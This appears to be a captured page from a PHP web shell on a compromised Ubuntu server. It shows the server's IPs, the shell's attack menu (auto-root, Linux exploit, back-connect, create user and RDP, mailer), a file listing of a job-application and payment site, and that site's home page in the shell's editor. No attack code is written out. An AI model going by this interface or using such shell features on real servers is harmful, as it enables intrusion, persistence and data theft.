Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.34.93
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
orms-gug /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
admin_22
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tcpdf_old
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
5501_DUBA1_DUBA155010100.jpg
14.52
KB
-rwxr-xr-x
5501_DUBA1_DUBA155010100_sign....
10.34
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cManualMailer.php
1.38
KB
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cconfig2.php
741
B
-rwxr-xr-x
home-copy.html
68.5
KB
-rwxr-xr-x
home.html
8.68
KB
-rwxr-xr-x
home.js
27.29
KB
-rwxr-xr-x
home_25102017.html
5.01
KB
-rwxr-xr-x
home_30082017.html
61.38
KB
-rwxr-xr-x
home__arun.html
63.56
KB
-rwxr-xr-x
index.html
6.55
KB
-rwxr-xr-x
index_16092017.html
5.55
KB
-rwxr-xr-x
index_old.html
5.66
KB
-rwxr-xr-x
main_page.html
5.84
KB
-rwxr-xr-x
main_page_09092017_befirechang...
5.32
KB
-rwxr-xr-x
payment_gate_way_responce.php
5.87
KB
-rwxr-xr-x
payment_gateway.php
8.43
KB
-rwxr-xr-x
phpinfo.php
25
B
-rwxr-xr-x
registration.html
2.65
KB
-rwxr-xr-x
registration.php
3.78
KB
-rwxr-xr-x
script.js
1.02
KB
-rwxr-xr-x
style.css
3.2
KB
-rwxr-xr-x
upload_file.php
604
B
-rwxr-xr-x
upload_file10.php
604
B
-rwxr-xr-x
upload_file11.php
604
B
-rwxr-xr-x
upload_file12.php
604
B
-rwxr-xr-x
upload_file13.php
604
B
-rwxr-xr-x
upload_file14.php
604
B
-rwxr-xr-x
upload_file15.php
604
B
-rwxr-xr-x
upload_file16.php
604
B
-rwxr-xr-x
upload_file17.php
604
B
-rwxr-xr-x
upload_file18.php
604
B
-rwxr-xr-x
upload_file19.php
604
B
-rwxr-xr-x
upload_file2.php
609
B
-rwxr-xr-x
upload_file20.php
604
B
-rwxr-xr-x
upload_file21.php
604
B
-rwxr-xr-x
upload_file22.php
604
B
-rwxr-xr-x
upload_file23.php
604
B
-rwxr-xr-x
upload_file24.php
604
B
-rwxr-xr-x
upload_file25.php
604
B
-rwxr-xr-x
upload_file3.php
604
B
-rwxr-xr-x
upload_file4.php
604
B
-rwxr-xr-x
upload_file5.php
604
B
-rwxr-xr-x
upload_file6.php
604
B
-rwxr-xr-x
upload_file7.php
604
B
-rwxr-xr-x
upload_file8.php
604
B
-rwxr-xr-x
upload_file9.php
604
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : home.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Expires" content="0" /> <title>Home Page</title> <link rel="shortcut icon" type="image/x-icon" href="../images/favicon.jpg" /> <link rel="stylesheet" href="css/style.css" type="text/css" media="all" /> <link rel="stylesheet" href="css/logstyle.css" type="text/css" media="all" /> <!-- Bootstrap Core CSS --> <link href="css/bootstrap.css" rel='stylesheet' type='text/css' /> <script src="js/jquery-1.7.2.min.js" type="text/javascript"></script> <script src="js/index.js?v=02" type="text/javascript"></script> <script src="js/control.js" type="text/javascript"></script> <script src="js/dytable.js" type="text/javascript"></script> <script src="js/validate.js" type="text/javascript"></script> <script src="js/form_submit.js" type="text/javascript"></script> <script src="js/loadtable.js" type="text/javascript"></script> <script src="js/home.js" type="text/javascript"></script> <script src="http://code.jquery.com/ui/1.11.1/jquery-ui.min.js"></script> <link rel="stylesheet" href="https://code.jquery.com/ui/1.11.1/themes/smoothness/jquery-ui.css" /> <script type="text/javascript" src="js/sessionexpired.js?v=10"></script> <script type="text/javascript"> $(function(){ // Dialog $('#dialog').dialog({ autoOpen: false, modal: true, width: 600, buttons: { "Ok": function() { $(this).dialog("close"); }, "Cancel": function() { $(this).dialog("close"); } } }); $('#task_dialog').dialog({ autoOpen: false, modal: true, width: 600, buttons: { "Ok": function() { $(this).dialog("close"); }, "Cancel": function() { $(this).dialog("close"); } } }); $('#batch_dialog').dialog({ autoOpen: false, modal: true, width: 600, buttons: { "Ok": function() { $(this).dialog("close"); }, "Cancel": function() { $(this).dialog("close"); } } }); $('#dialogWarning').dialog({ autoOpen: false, width: 400, modal: true, resizable: false, /*buttons:{ "Restart Session": function() { location.reload(); } }*/ }); $('#dialogExpired').dialog({ autoOpen: false, width: 400, modal: true, resizable: false, close: function() { window.location="index.html"; }, buttons: { "Login": function() { window.location="index.html"; } } }); checkSessionTimeEvent = setInterval("checkSessionTime()",10*1000); }); </script> </head> <body onload="isloggedinvalidate()"> <!-- wrapper --> <div id="wrapper"> <!-- shell --> <div class="shell"> <!-- container --> <div class="container"> <div style="margin-right:10px;padding-top:8px;color:#fff;" class="nav-top"> <span style="padding-left:5px;width:400px;" id="datestr"></span> <span style="float:right;padding-right:10px;"> <span id="user_name"></span> | <span onclick="loadhomepage()" style = 'cursor: pointer;'>Home</span> | <span onclick="loadchangepassword()" style = 'cursor: pointer;'>Change Password</span> | <span onclick="logoutsession()" style = 'cursor: pointer;'>Logout</span></span> </div <!-- header --> <header class="header"> <h4 id="logo"><a href="#">Logisys</a></h4> <br style="clear:both;"/> <nav id="navigation"> <ul> <!--<li class="active"><a href="#">Home</a></li> <li><a href="#">Upload documents</a></li> <li><a href="#">Preview</a></li> <li><a href="#">Payment</a></li> <li> <a href="#">Reprint Challan</a> </li> --> <center><span id = "postdata"></span></center> </ul> </nav> <div class="cl"> </div> </header> <!-- end of header --> <div class="main"> <div style="height:590px;" id = "home"> <br> <center> <table class="table table-bordered" style="width:1000px;" id="posttable"> <thead> <tr> <!-- <th style="width:450px;background-color:lightblue;font-family:'italic';">Vacancies</th> --> <th style="width:316px;background-color:lightblue;font-family:'italic';">Post</th> <th style="width:450px;background-color:lightblue;font-family:'italic';">Subject </th> <th style="width:100px;background-color:lightblue;font-family:'italic';">Action</th> </tr> </thead> <tbody> <tr> <!-- <td> <select class="form-control1" id="1S3" title="Qualifying Exam" onchange="getwithvacdepartment()"> <option value = '' >-Select-</option> <option value = 'Current Vacancies' >Current Vacancies</option> <option value = 'Reserved Vacancies(But not filled / Backlog)'>Reserved Vacancies(But not filled / Backlog)</option> </select> </td> --> <td><input type="hidden" name="postname" /><select class="form-control1" title="Post Applied for" id="1S1" onchange="getdepartment()" ></select></td> <td><select class="form-control1" id="1S2" title="Qualifying Exam"></select></td> <td align='center'><button onclick = "savepost()" type='button' class="btn btn-success";>Save</button></td> </tr> </tbody> </table> <div id = "postdetails"> <table class="table table-bordered" style="width:1000px;" id="postdettable"> <thead> <tr> <th style="width:50px;background-color:lightblue;font-family:'italic';">Sl. No.</th> <!-- <th style="width:200px;background-color:lightblue;font-family:'italic';">Vacancies Applied for</th> --> <th style="width:200px;background-color:lightblue;font-family:'italic';">Post Applied for</th> <th style="width:250px;background-color:lightblue;font-family:'italic';">Subject </th> <th style="width:100px;background-color:lightblue;font-family:'italic';">Application Number</th> <th style="width:50px;background-color:lightblue;font-family:'italic';">Actions</th> <th style="width:100px;background-color:lightblue;font-family:'italic';">Status</th> <th style="width:100px;background-color:lightblue;font-family:'italic';">Print</th> </tr></thead> <tbody> </tbody> </table> </div> </center> </div> <div id= "chapsw"> <div class="tab-content" style="padding-top:40px;"> <div class="tab-content-body" > <div class="login-body" style="border:1px solid #DDDDDD;"> <div class="login-heading" style="height:40px;"> <h1 style="margin-top:-2px;">Change Password</h1> </div> <div class="login-info"> <input type="password" class="pswold" id="T1" title="password old" name="Old Password" placeholder="Old Password" > <input type="password" name="password" id="T2" title="Password new" class="lock" placeholder="New Password" > <div class="forgot-top-grids"> <div class="forgot-grid"> <ul> <li> <input type="checkbox" id="brand1" value=""> </li> </ul> </div> <div class="clearfix"> </div> </div> <input type="submit" name="Change" onclick="chanpswvalidate();return false;" value="Change"> <hr> <!-- <a onclick = "sendpassword()" style = "float:right">Forgot Password</a> --> <!-- <div class="go-back login-go-back"> <a href="index.html">Go To Home</a> </div> --> <div class="copyright login-copyright"> <!-- <p>© 2017. All Rights Reserved.<br></p> --> </div> </div> </div> </div> </div> </div> <section style="background: url(images/appfromHd.jpg) repeat 0 0;"> </section> <!-- end of main --> <div id="dialog" title=""></div> <div id="task_dialog" title=""></div> <div id="batch_dialog" title=""></div> <div id="dialogExpired" title="Session (Page) Expired!" align="center" style="padding:25px 25px 0px 25px;"><p><span class="ui-icon ui-icon-alert" style="float:left; margin:0 7px 0 0;"></span> Your session has expired!<p id="dialogText-expired"></p></div> <div id="dialogWarning" title="Session (Page) Expiring!" align="center" style="padding:25px 25px 0px 25px;"><p><span class="ui-icon ui-icon-alert" style="float:left; margin:0 7px 0 0;"></span> Your session will expire in <span id="dialogText-warning"></span> seconds!</div> <!-- end of container --> </div> <!-- end of shell --> </div> <!-- end of wrappert --> <script src="js/script.js"></script> <script src="js/home.js" type="text/javascript"></script> </body> </html>
Close